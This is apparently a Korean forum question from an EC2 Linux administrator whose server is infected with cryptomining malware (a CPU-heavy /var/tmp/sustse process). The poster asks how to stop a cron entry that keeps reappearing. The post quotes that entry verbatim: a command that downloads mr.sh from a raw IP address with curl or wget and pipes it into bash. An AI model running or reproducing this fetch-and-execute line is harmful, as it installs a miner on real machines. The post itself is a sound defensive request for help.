지난 며칠 동안 EC2 Linux 인스턴스에서 실행되는 애플리케이션이 매우 느린 것을 발견했습니다. 명령을 실행하면 대부분의 CPU를 사용하는 top프로세스가 있음을 알 수 있습니다 ./var/tmp/sustse
나는 그 과정을 죽였다. 그러나 인스턴스를 재부팅한 후 다시 실행되기 시작하여 대부분의 CPU를 활용했습니다. 또한 다음 스크립트에 대한 cron 항목도 만듭니다.
*/30 * * * * (curl -s http://107.174.47.156/mr.sh||wget -q -O - http://107.174.47.156/mr.sh)|bash -sh
구글링을 해보니 이것이 암호화폐 채굴 악성코드인 것으로 나타났습니다. 나는 그 흔적을 제거했습니다/var/tmp/Crontab에서 항목을 제거했습니다. 그러나 Crontab의 이러한 항목은 어딘가에서 다시 나오는 것 같으며 이러한 항목을 만드는 스크립트의 정확한 위치를 추적할 수 없습니다.
또한 /var/spool/cron* 항목도 정리했습니다.
이 문제를 해결하기 위해 온라인에서 많은 정보를 찾지 못했습니다. 여기에 어떤 도움이라도 주시면 감사하겠습니다.
미리 감사드립니다!!